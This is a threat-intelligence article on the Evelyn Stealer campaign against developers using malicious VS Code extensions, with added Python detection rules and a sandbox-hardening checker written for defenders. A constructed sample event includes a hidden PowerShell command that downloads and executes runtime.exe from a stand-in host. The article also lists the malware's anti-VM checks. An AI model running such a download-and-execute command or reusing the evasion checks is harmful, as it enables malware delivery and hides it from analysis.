Evelyn Stealer Campaign Weaponizes Malicious VS Code Extensions to Target Developers
A multi-stage campaign dubbed Evelyn Stealer is targeting software developers through malicious Visual Studio Code extensions, leveraging a sophisticated infection chain that hijacks browser sessions and exfiltrates cryptocurrency wallets and credentials.

A multi-stage information-stealing campaign tracked as Evelyn Stealer is specifically targeting software developers by weaponizing the Visual Studio Code (VS Code) extension ecosystem, according to new analysis from Trend Micro. First identified by Koi.ai on December 8, 2025, the campaign uses a carefully crafted infection chain that begins with a malicious extension disguised as a legitimate development tool. Trend Micro's analysis reveals a layered attack architecture designed to evade detection while harvesting sensitive developer data, including credentials, cryptocurrency wallets, and session tokens.
The initial infection vector is a malicious VS Code extension that masquerades as legitimate software. Once installed, the extension drops a first-stage downloader built as a DLL that impersonates a legitimate Lightshot component and is loaded by a genuine `Lightshot.exe`, a DLL side-loading arrangement that lets the malicious code run under the name of trusted software. The downloader, identified by the SHA256 hash `369479bd9a248c9448705c222d81ff1a0143343a138fc38fc0ea00f54fcc1598`, creates a mutex so that only one instance runs, then launches a hidden PowerShell command that downloads the second-stage payload into the user's Local Temp directory as `runtime.exe` and executes it.
The second-stage payload is a process-hollowing injector. Designated `iknowyou.model` (SHA256: `92af258d13494f208ccf76f53a36f288060543f02ed438531e0675b85da00430`), it carries the final Evelyn Stealer payload encrypted with AES-256-CBC under a hardcoded 32-byte key and 16-byte IV. The injector starts a suspended instance of the legitimate Windows binary `grpconv.exe` via `CreateProcessA`, decrypts the embedded payload, writes it into the suspended process in place of the original image, and resumes execution, so the stealer runs under a process name that belongs to Windows. Because the key and IV are hardcoded, the final payload can be recovered statically from the injector without running it.
The final payload, Evelyn Stealer (`EvelynStealer.exe`, SHA256: `aba7133f975a0788dd2728b4bbb1d7d948e50571a033a1e8f47a2691e98600c5`), resolves every Windows API it needs at runtime rather than importing it, including the APIs for process injection, file operations, registry access, network communication, and clipboard access, which keeps telltale names out of its import table. The malware harvests a broad range of sensitive data: browser credentials via DLL injection, clipboard contents, Wi-Fi credentials, screenshots, and cryptocurrency wallet files. Exfiltration and command-and-control (C&C) traffic use FTP, which is unencrypted, so the stolen data and the FTP login itself are visible to anyone monitoring the network path.
Evelyn employs multiple evasion techniques designed to thwart security researchers and automated analysis environments. The malware enumerates the display adapter to detect VMware, VirtualBox, Hyper-V, Parallels, QEMU, VirtIO, and generic basic display adapters. It checks the hostname for VM indicators, flags systems with less than 60 GB of disk space (small disks are typical of analysis VMs), scans for VM-related processes such as `vmtoolsd.exe` and `vboxservice.exe`, and examines hardware registry keys for VM identifiers. It also detects attached debuggers and has dedicated checks for RDP sessions and Hyper-V, so an analysis VM has to clear every one of these checks before it can observe the stealer's real behaviour.
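Each step of the chain above leaves a distinct trace in endpoint telemetry, and the three file hashes are usable as-is. The following Python is an added example, not code from the Trend Micro or Koi.ai write-ups: it turns the chain's observable steps into rules and runs them over constructed Sysmon-style events (field names follow Sysmon Event IDs 1, 3 and 7; the paths, command line and IP address are invented, and the list of user-writable directories is an assumption to tune for your own estate).

```python
"""Flag the Evelyn Stealer infection chain in Sysmon-style telemetry.

Added example, not code from the Trend Micro or Koi.ai write-ups. Field
names follow Sysmon Event ID 1 (process create), 7 (image load) and 3
(network connect); every event below is constructed for this example and
the paths, command line and IP address are invented.
"""
import re

# SHA256 indicators quoted in the write-up, mapped to the stage they belong to.
EVELYN_SHA256 = {
    "369479bd9a248c9448705c222d81ff1a0143343a138fc38fc0ea00f54fcc1598": "stage-1 downloader (fake Lightshot DLL)",
    "92af258d13494f208ccf76f53a36f288060543f02ed438531e0675b85da00430": "iknowyou.model injector",
    "aba7133f975a0788dd2728b4bbb1d7d948e50571a033a1e8f47a2691e98600c5": "EvelynStealer.exe",
}

# Directories an unprivileged user can write to (ASSUMED list; extend for your estate).
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\[^\\]+\\Downloads|ProgramData)\\", re.I)
HIDDEN_PS = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def sha256_of(event):
    """Pull SHA256 out of Sysmon's 'Hashes' field ('SHA256=...,MD5=...')."""
    for part in event.get("Hashes", "").split(","):
        if part.upper().startswith("SHA256="):
            return part.split("=", 1)[1].lower()
    return None


def classify(ev):
    """Return (rule, detail) pairs for one event; an empty list means benign."""
    hits = []
    eid, img = ev["EventID"], basename(ev.get("Image", ""))
    parent = ev.get("ParentImage", "")
    digest = sha256_of(ev)
    if digest in EVELYN_SHA256:
        hits.append(("known_hash", EVELYN_SHA256[digest]))
    # Stage 1: genuine Lightshot.exe loading a DLL from a user-writable location.
    if eid == 7 and img == "lightshot.exe" and USER_WRITABLE.search(ev.get("ImageLoaded", "")):
        hits.append(("sideload", f"Lightshot.exe loaded {ev['ImageLoaded']}"))
    # Stage 1 -> 2: hidden PowerShell that references runtime.exe.
    cmd = ev.get("CommandLine", "")
    if eid == 1 and img == "powershell.exe" and HIDDEN_PS.search(cmd) and "runtime.exe" in cmd.lower():
        hits.append(("stage2_fetch", f"hidden PowerShell under {basename(parent)} references runtime.exe"))
    # Stage 2 -> 3: grpconv.exe started by something living in a user-writable path.
    if eid == 1 and img == "grpconv.exe" and (USER_WRITABLE.search(parent) or basename(parent) == "runtime.exe"):
        hits.append(("hollow_target", f"grpconv.exe spawned by {parent}"))
    # Stage 3: grpconv.exe has no legitimate reason to touch the network at all.
    if eid == 3 and img == "grpconv.exe":
        hits.append(("grpconv_network", f"grpconv.exe -> {ev.get('DestinationIp')}:{ev.get('DestinationPort')}"))
    return hits


def scan(events):
    """Group hits by rule name across an event stream."""
    found = {}
    for ev in events:
        for rule, detail in classify(ev):
            found.setdefault(rule, []).append(detail)
    return found


# Constructed events: one per stage, bracketed by two benign events that must not fire.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Program Files (x86)\Lightshot\Lightshot.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Hashes": "SHA256=0000000000000000000000000000000000000000000000000000000000000000"},
    {"EventID": 7, "Image": r"C:\Users\dev\AppData\Local\Temp\ls\Lightshot.exe",
     "ImageLoaded": r"C:\Users\dev\AppData\Local\Temp\ls\helper.dll",
     "Hashes": "SHA256=369479bd9a248c9448705c222d81ff1a0143343a138fc38fc0ea00f54fcc1598"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Temp\ls\Lightshot.exe",
     "CommandLine": r'powershell.exe -w hidden -c "iwr https://example.invalid/r -OutFile $env:LOCALAPPDATA\Temp\runtime.exe; & $env:LOCALAPPDATA\Temp\runtime.exe"'},
    {"EventID": 1, "Image": r"C:\Users\dev\AppData\Local\Temp\runtime.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\dev\AppData\Local\Temp\runtime.exe",
     "Hashes": "SHA256=92af258d13494f208ccf76f53a36f288060543f02ed438531e0675b85da00430"},
    {"EventID": 1, "Image": r"C:\Windows\System32\grpconv.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Temp\runtime.exe", "CommandLine": "grpconv.exe"},
    {"EventID": 3, "Image": r"C:\Windows\System32\grpconv.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 21},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe -NoProfile Get-ChildItem"},
]

if __name__ == "__main__":
    for rule, details in scan(SAMPLE_EVENTS).items():
        for detail in details:
            print(f"[{rule}] {detail}")
```

The hash rule is the cheapest and the most brittle, since a rebuilt sample changes it; the behavioural rules (a DLL loaded by `Lightshot.exe` from a user-writable path, `grpconv.exe` with an unexpected parent, `grpconv.exe` opening any socket) survive repacking and are the ones worth keeping in a hunting query.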
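A sandbox that trips any of these checks will not show the stealer's real behaviour, so it pays to score the analysis VM against them before detonation. The following Python is an added example, not Trend Micro's code: it applies the checks the write-up lists to a host profile and reports which would fire. The vendor strings, the 60 GB threshold and the two process names come from the write-up; the hostname and registry substrings, the RDP session check and the debugger flag are this example's assumptions about what the malware matches on, and both host profiles are constructed.

```python
"""Score a host profile against the anti-analysis checks attributed to Evelyn.

Added example, not code from the Trend Micro analysis. The lists marked
ASSUMED are this example's guesses at the substrings the stealer matches
on; the write-up names only the vendors, the threshold and two processes.
Both host profiles below are constructed.
"""

GPU_VENDORS = ("vmware", "virtualbox", "hyper-v", "parallels", "qemu", "virtio", "basic display adapter")
VM_PROCESSES = {"vmtoolsd.exe", "vboxservice.exe"}
MIN_DISK_GB = 60
HOSTNAME_HINTS = ("sandbox", "virtual", "vbox", "vmware", "analysis")  # ASSUMED
REGISTRY_HINTS = ("vbox", "vmware", "qemu", "virtual", "hyper")         # ASSUMED


def evelyn_vm_checks(host):
    """Return one line per check the host would fail; an empty list passes."""
    failed = []
    for gpu in (g.lower() for g in host.get("gpus", [])):
        vendor = next((v for v in GPU_VENDORS if v in gpu), None)
        if vendor:
            failed.append(f"gpu: '{gpu}' matches {vendor}")
    name = host.get("hostname", "")
    hint = next((h for h in HOSTNAME_HINTS if h in name.lower()), None)
    if hint:
        failed.append(f"hostname: '{name}' contains {hint}")
    disk = host.get("disk_gb", 0)
    if disk < MIN_DISK_GB:
        failed.append(f"disk: {disk} GB is below {MIN_DISK_GB} GB")
    running = {p.lower() for p in host.get("processes", [])}
    for proc in sorted(running & VM_PROCESSES):
        failed.append(f"process: {proc} is running")
    for key, value in host.get("registry", {}).items():
        hint = next((h for h in REGISTRY_HINTS if h in value.lower()), None)
        if hint:
            failed.append(f"registry: {key} = '{value}' contains {hint}")
    if host.get("session_name", "").upper().startswith("RDP-"):  # ASSUMED form of the RDP check
        failed.append(f"rdp: session '{host['session_name']}' is a remote desktop session")
    if host.get("debugger_present"):
        failed.append("debugger: a debugger is attached")
    return failed


# Constructed profile of an out-of-the-box VirtualBox analysis machine.
STOCK_VBOX = {
    "gpus": ["VirtualBox Graphics Adapter (WDDM)"],
    "hostname": "SANDBOX-01",
    "disk_gb": 40,
    "processes": ["explorer.exe", "VBoxService.exe", "VBoxTray.exe"],
    "registry": {r"HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum\0": r"SCSI\Disk&Ven_VBOX&Prod_HARDDISK"},
    "session_name": "RDP-Tcp#0",
    "debugger_present": False,
}

# Constructed profile of the same VM after hardening: GPU string, hostname,
# disk size, guest additions, disk vendor string and console access all changed.
HARDENED = {
    "gpus": ["NVIDIA GeForce GTX 1660"],
    "hostname": "DESKTOP-7K3PQ2R",
    "disk_gb": 250,
    "processes": ["explorer.exe", "Code.exe"],
    "registry": {r"HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum\0": r"SCSI\Disk&Ven_Samsung&Prod_SSD_870"},
    "session_name": "Console",
    "debugger_present": False,
}

if __name__ == "__main__":
    for label, profile in (("stock", STOCK_VBOX), ("hardened", HARDENED)):
        print(f"{label}: {len(evelyn_vm_checks(profile))} check(s) fail")
        for line in evelyn_vm_checks(profile):
            print("  " + line)
```

On a real Windows host the profile can be filled from `Get-CimInstance Win32_VideoController` (adapter names), `$env:COMPUTERNAME`, `Get-PSDrive C` (free plus used space), `Get-Process`, the `Disk\Enum` registry values and `$env:SESSIONNAME`; the point of the exercise is that every line the function prints is one reason the sample may refuse to run.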
The campaign's focus on developers is notable because compromised development environments can serve as access points into broader organizational systems. By stealing credentials, API keys, and session tokens, the attackers can pivot to production systems, cloud resources, and CI/CD pipelines. Trend Micro notes that organizations with software development teams relying on VS Code and third-party extensions are at heightened risk, as are those with access to digital assets and cloud infrastructure.
TrendAI Vision One detects and blocks indicators of compromise associated with the Evelyn Stealer campaign, and Trend Micro has released tailored threat hunting queries and intelligence reports for its customers. The analysis underscores the growing trend of threat actors targeting the software supply chain through developer tools, following recent incidents involving malicious NPM packages and compromised IDE extensions. Developers and security teams are advised to vet VS Code extensions carefully before installing them, restrict extension installation to trusted sources, and monitor for the chain's observable steps: `Lightshot.exe` loading a DLL from a user-writable directory, hidden PowerShell writing `runtime.exe` into the Local Temp directory, `grpconv.exe` launched from such a directory, and any network connection from `grpconv.exe` at all.